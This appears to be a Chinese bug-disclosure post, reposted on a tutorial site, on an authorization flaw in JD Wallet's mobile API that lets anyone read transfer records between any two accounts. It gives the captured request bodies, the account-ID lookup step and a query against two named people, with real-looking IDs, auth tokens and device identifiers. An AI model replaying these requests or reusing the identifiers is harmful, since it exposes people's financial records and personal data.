网站首页 > 教程文章 正文
京东钱包越权查询之任意查看两账户之间的转账信息,强调下是任意两个账户!!
1.当客户端查询两个账户的交易转账记录时,使用Fiddler抓取到的封包如下(插曲:HTTPS的SSL证书校验可简单绕过真的不重要吗?内部却直接忽略了。。所以来乌云了):
?
1
2
3
4
5
6
7
8
9
POST
Content-Type: application/json; charset=UTF-8
Content-Length: 309
Host: m.wangyin.com
Connection: Close
User-Agent: android
Accept-Encoding: gzip
{"desCustomerId":"360000000041109552","pageNum":1,"pageSize":10,"channel":"xiaomi","clientVersion":"4.1.0","customerId":"360000000215219468","macAddress":"14-f6-5a-d1-47-0f","auth":"f9957871d0a24d108e62015942f4d5b5","userId":"1200006529071","clientName":"android","deviceId":"866001023475214","version":"2.0"}
发现了什么?是的,没有任何的Cookie、Key、Salt之类的东西,然后我把封包精简如下,仍然正常请求到结果:
{"desCustomerId":"360000000041109552","pageNum":1,"pageSize":10,"channel":"","clientVersion":"","customerId":"360000000215219468","macAddress":"","auth":"","userId":"1200006529071","clientName":"","deviceId":"","version":""}
所以只需要三个信息就可查询两个账户之间的转账记录,具体如下图:
那么,问题来了,只知道一个手机账号,怎么获取任意账户的两个ID呢?(不知什么策略,一个账户有userID和userID2..)我扶了扶眼睛,想到了一个细节,那就是在转账的时候不是会验证账户吗,看他会不会返回验证账户的两个ID,测试果然。精简后的请求封包为:
Content-Length: 301
{"desCustomerName":"u7RNVmqGzNrHVgn/vI/UpQ\u003d\u003d","channel":"","clientVersion":"","customerId":"360000000253312977","macAddress":"","auth":"f15d43c3986293cfc3885121ad2204e3","userId":"1200010338038","clientName":"","deviceId":"","version":""}
他把手机号加密了,不过没关系,请求到就好,成功返回了验证账户的两个ID:
{"resultCode":0,"resultMsg":null,"resultData":{"validUser":true,"realNameUser":true,"desUserName":"*笑","accountName":"186****5417","historyTransfer":false,"desHeadIconUrl":"http://img20.360buyimg.com/payment/jfs/t1237/176/1060321396/24129/3671b827/557062baN2458bbda.png","inUserId":"1200006529071","inCustomerId":"360000000215219468"}}
这样就好了,我们可以成功获取任何账户的两个ID,那么任意两个账户之间的转账信息也就能获取了。
下面我就从我前几天搞到的内部账号来测试下两两转账的信息:
刑同举的两个ID:
岳棱辉的两个ID:
我们以刑同举为主角查看他与岳棱辉的转账信息。构造POST请求:
Content-Length: 224
{"desCustomerId":"360000000064845496","pageNum":1,"pageSize":10,"channel":"","clientVersion":"","customerId":"360000000051318036","macAddress":"","auth":"","userId":"1000000003607","clientName":"","deviceId":"","version":""}
请求结果:
不用多说了吧!
解决方案:
“是的,没有任何的Cookie、Key、Salt之类的东西,”
猜你喜欢
- 2025-01-13 暑期出行季:请收好这份儿童、学生乘车指南
- 2025-01-13 如何在5分钟产出海量竞品高认知人群你造吗?
- 2025-01-13 赏文物里的“鱼”纹样:转发这个锦鲤,祝高考顺利!
- 最近发表
- 标签列表
-
- location.href (44)
- document.ready (36)
- git checkout -b (34)
- 跃点数 (35)
- 阿里云镜像地址 (33)
- qt qmessagebox (36)
- mybatis plus page (35)
- vue @scroll (38)
- 堆栈区别 (33)
- 什么是容器 (33)
- sha1 md5 (33)
- navicat导出数据 (34)
- 阿里云acp考试 (33)
- 阿里云 nacos (34)
- redhat官网下载镜像 (36)
- srs服务器 (33)
- pico开发者 (33)
- https的端口号 (34)
- vscode更改主题 (35)
- 阿里云资源池 (34)
- os.path.join (33)
- redis aof rdb 区别 (33)
- 302跳转 (33)
- http method (35)
- js array splice (33)